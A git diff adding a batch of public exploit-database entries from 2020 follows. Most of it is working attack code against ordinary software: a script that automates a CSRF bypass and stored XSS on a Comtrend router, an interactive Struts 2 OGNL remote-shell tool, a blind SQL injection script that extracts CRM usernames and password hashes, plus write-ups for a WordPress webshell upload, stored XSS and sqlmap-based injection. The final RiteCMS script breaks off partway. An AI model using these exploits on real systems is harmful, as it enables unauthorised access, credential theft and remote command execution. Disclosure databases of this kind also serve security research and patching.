diff --git a/exploits/hardware/webapps/48908.py b/exploits/hardware/webapps/48908.py
new file mode 100755
index 000000000..9f5e83f07
--- /dev/null
+++ b/exploits/hardware/webapps/48908.py
@@ -0,0 +1,274 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+"""
+Exploit Title: Persistent XSS on Comtrend AR-5387un router
+Date: 19/10/2020
+Exploit Author: OscarAkaElvis
+Vendor Homepage: https://www.comtrend.com/
+Version: Comtrend AR-5387un router
+Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i
+CVE: CVE-2018-8062
+
+Disclosure timeline:
+08/03/2018: Vulnerability was discovered
+10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062)
+11/03/2018: Mitre answered, CVE number reserved
+11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered
+16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233)
+18/10/2020: Exploit creation
+19/10/2020: Exploit sent to exploit-db
+
+Exploitation explanation:
+To exploit this vulnerability, once logged into the router, a WAN service must be created
+Click on "Advanced Setup", "WAN Service". "Add button", "Next"
+Then insert the payload into the "Enter Service Description" field. This was used for the PoC
+Then click on "Next" four times to go on through the steps and finally click on "Apply/Save"
+The result of the XSS will be displayed and triggered on the WAN services page
+
+This exploit automatize the entire process bypassing CSRF protection and allowing to set a custom XSS payload
+Happy hacking :)
+OscarAkaElvis - https://twitter.com/OscarAkaElvis
+"""
+
+# Dependencies and libraries
+import requests
+from requests.auth import HTTPBasicAuth
+import re
+from sys import argv, exit
+import argparse
+from os import path
+from time import sleep
+
+
+class Exploit(object):
+
+ # Global class vars
+ session = requests.Session()
+ user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36"
+ ip = None
+ username = None
+ password = None
+ payload = None
+ default_ip = "192.168.1.1"
+ default_username = "admin"
+ default_password = "admin"
+ default_payload = ""
+ exploit_version = "1.0"
+ current_sessionkey = None
+ referer_sessionkey = None
+
+ script_name = path.basename(argv[0])
+ description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router'
+ epilog_text = 'Examples:\n python3 ' + script_name + ' -i 192.168.0.150\n python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'\''
+
+ def start_msg(self):
+ print("[*] Starting CVE-2018-8062 exploit...")
+ sleep(0.5)
+
+ def check_params(self, arguments):
+ parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text)
+ parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP')
+ parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME')
+ parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD')
+ parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD')
+ parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit")
+
+ args = parser.parse_args(arguments)
+
+ self.start_msg()
+
+ print("[*] Launch the exploit using -h argument to check all the available options")
+ print()
+
+ if not args.ip:
+ self.ip = self.default_ip
+ print("[!] Warning, no ip set, default will be used: " + str(self.ip))
+ else:
+ self.ip = args.ip
+
+ if not args.username:
+ self.username = self.default_username
+ print("[!] Warning, no username set, default will be used: " + str(self.username))
+ else:
+ self.username = args.username
+
+ if not args.password:
+ self.password = self.default_password
+ print("[!] Warning, no password set, default will be used: " + str(self.password))
+ else:
+ self.password = args.password
+
+ if not args.payload:
+ self.payload = self.default_payload
+ print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload))
+ else:
+ self.password = args.password
+
+ def print_version(self):
+ print()
+ return 'v{}'.format(self.exploit_version)
+
+ def check_router(self):
+ try:
+ print()
+ print("[*] Trying to detect router...")
+
+ headers = {"User-Agent": self.user_agent}
+ response = self.session.get("http://" + str(self.ip) + "/", headers=headers)
+
+ if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)):
+ print("[+] Comtrend router detected successfully")
+ else:
+ print()
+ print("[-] It seems the target is not a Comtrend router")
+ print("[*] Exiting...")
+ exit(1)
+ except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError):
+ print()
+ print("[-] Can't connect to the router")
+ print("[*] Exiting...")
+ exit(1)
+
+ def check_login(self):
+ print()
+ print("[*] Trying to login...")
+
+ headers = {"User-Agent": self.user_agent}
+ response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ if response.status_code != 401:
+ print("[+] Login successfully!")
+ sleep(1)
+ else:
+ print()
+ print("[-] Can't login into the router. Check your creds!")
+ print("[*] Exiting...")
+ exit(1)
+
+ def get_sessionKey(self, response_text):
+ sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text))
+
+ if sessionKey is not None:
+ sessionKey = sessionKey.group(1)
+ else:
+ sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE)
+ if sessionKey is not None:
+ sessionKey = sessionKey.group(1)
+
+ return sessionKey
+
+ def step1(self):
+ print()
+ print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...")
+
+ headers = {"User-Agent": self.user_agent}
+ response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ print("[+] Success! Initial sessionKey: " + self.current_sessionkey)
+ sleep(1)
+
+ def step2(self):
+ print()
+ print("[*] Performing step 2/8...")
+
+ paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"}
+ response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def step3(self):
+ print()
+ print("[*] Performing step 3/8...")
+
+ paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey}
+ response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def step4(self):
+ print()
+ print("[*] Performing step 4/8...")
+
+ paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey}
+ response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def step5(self):
+ print()
+ print("[*] Performing step 5/8...")
+
+ paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey}
+ response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def step6(self):
+ print()
+ print("[*] Performing step 6/8...")
+
+ paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey}
+ response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def step7(self):
+ print()
+ print("[*] Performing step 7/8...")
+
+ paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey}
+ response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def final_step8(self):
+ print()
+ print("[*] Performing final step 8/8. Deploying XSS payload...")
+
+ paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey}
+ self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ print()
+ print("[+] XSS payload deployed successfully")
+ print("[+] Happy hacking :) . Author: OscarAkaElvis")
+
+ @staticmethod
+ def main(self, arguments):
+ self.check_params(arguments)
+ self.check_router()
+ self.check_login()
+ self.step1()
+ self.step2()
+ self.step3()
+ self.step4()
+ self.step5()
+ self.step6()
+ self.step7()
+ self.final_step8()
+ exit(0)
+
+
+if __name__ == '__main__':
+ ImportObject = Exploit()
+ ImportObject.main(ImportObject, argv[1:])
\ No newline at end of file
diff --git a/exploits/java/webapps/48917.py b/exploits/java/webapps/48917.py
new file mode 100755
index 000000000..06d3357a0
--- /dev/null
+++ b/exploits/java/webapps/48917.py
@@ -0,0 +1,79 @@
+# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
+# Google Dork: ext:action | filetype:action
+# Date: 2020/09/09
+# Exploit Author: Jonatas Fil
+# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html
+# Version: <= 2.3.15
+# Tested on: Linux
+# CVE : CVE-2013-2251
+
+#!/usr/bin/python
+#
+# coding=utf-8
+#
+# Struts 2 DefaultActionMapper Exploit [S2-016]
+# Interactive Shell for CVE-2013-2251
+#
+# The Struts 2 DefaultActionMapper supports a method for short-circuit
+navigation state changes by prefixing parameters with
+# "action:" or "redirect:", followed by a desired navigational target
+expression. This mechanism was intended to help with
+# attaching navigational information to buttons within forms.
+#
+# https://struts.apache.org/docs/s2-016.html
+# Jonatas Fil (@exploitation)
+
+import requests
+import sys
+import readline
+
+
+# Disable SSL
+requests.packages.urllib3.disable_warnings()
+
+# ShellEvil
+if len(sys.argv) == 2:
+ target = sys.argv[1] # Payload
+ first = target +
+"?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','"
+ second =
+"'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"
+ loop = 1
+ while loop == 1:
+ cmd = raw_input("$ ")
+ while cmd.strip() == '':
+ cmd = raw_input("$ ")
+ if cmd.strip() == '\q':
+ print("Exiting...")
+ sys.exit()
+ try:
+ headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"}
+ pwn=requests.get(first+cmd+second,headers =
+headers,verify=False) # Disable SSL
+ if pwn.status_code == 200:
+ print pwn.content # 1337
+ else:
+ print("Not Vuln !")
+ sys.exit()
+ except Exception,e:
+ print e
+ print("Exiting...")
+ sys.exit()
+
+else: # BANNER
+ print('''
+ __ _ _ _ __ _ _
+/ _\ |__ ___| | | /__\_ _(_) |
+\ \| '_ \ / _ \ | |/_\ \ \ / / | |
+_\ \ | | | __/ | //__ \ V /| | |
+\__/_| |_|\___|_|_\__/ \_/ |_|_|
+
+ by Jonatas Fil [@explotation]
+''')
+ print("======================================================")
+ print("# Struts 2 DefaultActionMapper Exploit [S2-016] #")
+ print("# USO: python struts.py http://site.com:8080/xxx.action #")
+ print("======================================================")
+ print("bye")
+ sys.exit()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48919.txt b/exploits/multiple/webapps/48919.txt
new file mode 100644
index 000000000..050088766
--- /dev/null
+++ b/exploits/multiple/webapps/48919.txt
@@ -0,0 +1,32 @@
+# Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability (Authenticated)
+# Date: 10.8.2020.
+# Exploit Author: n1x_ [MS-WEB]
+# Software Homepage: https://wordpress.org/plugins/wp-colorbox/
+# Software Link (v1.1.1): https://downloads.wordpress.org/plugin/wp-colorbox.1.1.1.zip
+# Product Version: 1.1.1
+
+[Description]
+
+# WordPress Colorbox plugin is a simple lightbox tool for WordPress. It allows users to pop up content in lightbox using the popular jQuery ColorBox library.
+
+# Due to improper input santitization of "hyperlink" field, of the plugin shortcode, version v1.1.1 (and possibly previous versions), are affected by a stored XSS vulnerability.
+
+[Proof of Concept]
+
+# 1. Authorization as user with privileges to write and publish posts
+# 2. Injecting code into "hyperlink" field of the plugin shorthocode, and publishing the post
+# 3. The code is stored on the post
+
+
+[Example payloads]
+
+
+# Example payload 1: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink=""]
+
+# Example payload 2: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink=""]
+
+[Response]
+
+...
+
+...
\ No newline at end of file
diff --git a/exploits/php/webapps/48909.txt b/exploits/php/webapps/48909.txt
new file mode 100644
index 000000000..1a613fafa
--- /dev/null
+++ b/exploits/php/webapps/48909.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)
+# Google Dork: N/A
+# Date: 2020/10/19
+# Exploit Author: Akıner Kısa
+# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip
+# Version: 1.0
+# Tested on: XAMPP
+# CVE : N/A
+
+Vulnerable Pages:
+
+http://localhost/loan/index.php?page=loans
+http://localhost/loan/index.php?page=payments
+http://localhost/loan/index.php?page=borrowers
+http://localhost/loan/index.php?page=loan_type
+
+Proof of Concept:
+
+1 - Go to vulnerable pages and using edit button (in the right, action column).
+
+2 - And fill the blanks with "" payload.
\ No newline at end of file
diff --git a/exploits/php/webapps/48910.txt b/exploits/php/webapps/48910.txt
new file mode 100644
index 000000000..ba43480b7
--- /dev/null
+++ b/exploits/php/webapps/48910.txt
@@ -0,0 +1,15 @@
+# Exploit Title: WP Courses < 2.0.29 - Broken Access Controls leading to
+Courses Content Disclosure
+# Exploit Author: Stefan Broeder, Marco Ortisi (redtimmysec)
+# Authors blog: https://www.redtimmy.com
+# Vendor Homepage: https://wpcoursesplugin.com/
+# Version Vulnerable: < 2.0.29
+# CVE: (requested but not assigned yet)
+
+WP Courses plugin < 2.0.29 does not protect the courses which could be
+accessed by unauthenticated users using the REST API (/wp-jon/)
+endpoints (for example /wp-json/wp/v2/lesson/{lesson_id}) This could
+result in attackers accessing paying content without authorization.
+
+Full story here:
+https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/
\ No newline at end of file
diff --git a/exploits/php/webapps/48911.txt b/exploits/php/webapps/48911.txt
new file mode 100644
index 000000000..24ba0783b
--- /dev/null
+++ b/exploits/php/webapps/48911.txt
@@ -0,0 +1,41 @@
+# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection
+# Exploit Author: Rahul Ramkumar
+# Date: 2020-09-16
+# Vendor Homepage: https://projectworlds.in
+# Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip
+# Version: 1.0
+# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
+# CVE: CVE-2020-25760
+# Description
+The file front.php does not perform input validation on the 'rid' paramter. An attacker can append SQL queries to the input to extract sensitive information from the database.
+Note: This exploit can work pre-authentication as well, but need to change the 302 Response to 200 using an intercept tool. It should be pretty straight forward so I have not shown how.
+
+#POC
+
+1) Navigate to the login page
+
+Example:
+
+http://192.168.1.72/visitor_management/index.php
+
+2) Enter 'username' and 'password'
+
+3) On the homepage, click on any visitor name and intercept the request
+
+4) Save the request to file. Example, visitor_management_sqli.req
+
+GET /visitor_management/front.php?rid=373568 HTTP/1.1
+Host: 192.168.1.72
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Referer: http://192.168.1.72/visitor_management/front.php
+Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef
+Upgrade-Insecure-Requests: 1
+
+5) Run SQLmap on the file,
+
+sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10
\ No newline at end of file
diff --git a/exploits/php/webapps/48912.py b/exploits/php/webapps/48912.py
new file mode 100755
index 000000000..008ad84e6
--- /dev/null
+++ b/exploits/php/webapps/48912.py
@@ -0,0 +1,103 @@
+# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage
+# Date: 2020-16-09
+# Exploit Author: nag0mez
+# Vendor Homepage: https://ultimatepro.codexcube.com/
+# Version: <= 2.0.5
+# Tested on: Kali Linux 2020.2
+
+
+# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.
+
+#!/usr/bin/env python3
+#-*- coding: utf-8 -*-
+import requests
+import sys
+
+# The original vulnerability was found on a server with an invalid SSL certificate,
+# which Python could not verify. I added the verify=False parameter to avoid SSL check.
+# The lack of verification results in a warning message from Python.
+# To get a clean output, we will ignore all warnings.
+import warnings
+warnings.filterwarnings("ignore")
+
+host = 'https://testurl.test' # Change
+url = "{}/frontend/get_article_suggestion/".format(host)
+
+chars = '1234567890abcdefghijklmnopqrstuvwxyz'
+hex_chars = 'abcdef1234567890'
+
+def send_payload(payload):
+ try:
+ response = requests.post(url, data=payload, verify=False)
+ content = response.text
+ length = len(content)
+ return length
+ except Exception as e:
+ print('Cannot connect to host. Exit.')
+ sys.exit(1)
+
+
+def get_first_user():
+ found = True
+ known = ''
+
+ while found:
+
+ found = False
+ for c in chars:
+ test = known + c
+ payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)}
+ length = send_payload(payload)
+
+ if length > 2:
+ found = True
+ known += c
+ print(c, end='')
+ sys.stdout.flush()
+ break
+
+ return known
+
+def get_hash(username):
+ found = True
+ known = ''
+
+ while found:
+
+ found = False
+ for c in hex_chars:
+ test = known + c
+ payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)}
+ length = send_payload(payload)
+
+ if length > 2:
+ found = True
+ known += c
+ print(c, end='')
+ sys.stdout.flush()
+ break
+
+ return known
+
+
+if __name__ == '__main__':
+ print('Exploit started.')
+ print('Guessing username...')
+
+ username = get_first_user()
+
+ if username != '':
+ print('\nUsername found: {}'.format(username))
+ else:
+ print('\nCould not get username! Exit.')
+ sys.exit(1)
+
+ print('Guessing password SHA512 hash...')
+
+ sha = get_hash(username)
+
+ if sha != '':
+ print('\nHash found: {}'.format(sha))
+ else:
+ print('\nCould not get Hash! Exit.')
+ sys.exit(1)
\ No newline at end of file
diff --git a/exploits/php/webapps/48913.txt b/exploits/php/webapps/48913.txt
new file mode 100644
index 000000000..b157ee8a3
--- /dev/null
+++ b/exploits/php/webapps/48913.txt
@@ -0,0 +1,67 @@
+# Exploit Title: WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload
+# Date: 2020-10-20
+# Exploit Author: Net-Hunter
+# Google Dork: N/A
+# Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/
+# Vendor Homepage: https://www.heliossolutions.co/
+# Tested on: Linux Apache / Wordpress 5.5.1
+# Version: 2.1
+
+
+.:: Description ::.
+An Authenticated User Can Bypass Uploader of the Plugin and Upload Arbitary File
+Because the extension of the Uploaded Flie is Checked on Client Side
+
+.:: Vulnerable File ::.
+/wp-admin/admin.php?page=hs-brand-logo-slider.php
+
+.:: Vulnerable Code ::.
+Content-Disposition: form-data; name="logoupload"; filename="a.php"
+Content-Type: image/jpeg
+
+
+.:: Proof Of Concept (Poc) ::.
+Step 1 - Log in to your account , Select hs-brand-logo-slider from the menu
+Upload
+Step 2 - Stop the upload request with burp suite
+Step 3 - Rename the file, for example a.jpg to a.php
+Step 4 - Your shell has been uploaded, showing the file path in the table
+
+.:: Sample Request::.
+
+POST /wp-admin/admin.php?page=hs-brand-logo-slider.php HTTP/1.1
+Host: 172.16.1.17:81
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://172.16.1.17:81/wp-admin/admin.php?page=hs-brand-logo-slider.php
+Content-Type: multipart/form-data; boundary=---------------------------407602771734524910834293111227
+Content-Length: 81765
+Origin: http://172.16.1.17:81
+Connection: close
+Cookie: wordpress_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C15d778148be9d49e48b6275e009642192e10b1d8a9e5e44a191141084f2618b6; wp-settings-time-2=1592045029; wp-settings-2=libraryContent%3Dbrowse%26editor%3Dtinymce; wp_learn_press_session_558570ec66c8a5729fc0bd982edbc38a=9c5476d130f39254b97895578a6cf9e2%7C%7C1603353694%7C%7Cd6957c27eda7a311e486866587a08500; wordpress_test_cookie=WP+Cookie+check; wordpress_lp_guest=fad4f6783283c86762dc8944423947d0; wordpress_logged_in_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C80d7786798b351d10cbdfe07ba50c31d2400ccbfb173d4b90255cab42791ccd7; wp-settings-time-1=1603180907
+Upgrade-Insecure-Requests: 1
+
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="brandname"
+
+aaa
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="logoupload"; filename="eftekharr.php"
+Content-Type: image/jpeg
+
+
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="logourl"
+
+http://aa.com
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="sortorder"
+
+1
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="submit_data"
+
+Submit
+-----------------------------407602771734524910834293111227--
\ No newline at end of file
diff --git a/exploits/php/webapps/48914.txt b/exploits/php/webapps/48914.txt
new file mode 100644
index 000000000..a7e0b124b
--- /dev/null
+++ b/exploits/php/webapps/48914.txt
@@ -0,0 +1,27 @@
+# Exploit Title: User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS
+# Google Dork: N/A
+# Date: 2020-08-07
+# Exploit Author: yusufmalikul
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 2.1
+# Tested on: Windows 10
+# CVE : N/A
+
+Description
+
+User Registration & Login and User Management System With admin panel 2.1 application from PHPgurukul is vulnerable to
+Persistent XSS via the fname, lname, email, and contact field name when user register on the site then admin viewing user
+list on manage user page triggering the payload.
+
+POC
+
+User side
+1. Go to the user registration page http://localhost/loginsystem
+2. Enter in one of the field (first name, last name, email, or contact)
+3. Click sign up
+
+Admin side
+1. Login to admin panel http://localhost/loginsystem/admin
+2. After login successful it will redirect to manage user page
+3. Payload triggered
\ No newline at end of file
diff --git a/exploits/php/webapps/48915.py b/exploits/php/webapps/48915.py
new file mode 100755
index 000000000..ed1c5db09
--- /dev/null
+++ b/exploits/php/webapps/48915.py
@@ -0,0 +1,129 @@
+# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
+# Date: 2020-07-03
+# Exploit Author: H0j3n
+# Vendor Homepage: http://ritecms.com/
+# Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download
+# Version: 2.2.1
+# Tested on: Linux
+# Reference: https://www.exploit-db.com/exploits/48636
+
+# !/usr/bin/python
+# coding=utf-8
+import requests,sys,base64,os
+from colorama import Fore, Back, Style
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+# Variable
+CONTENT = '''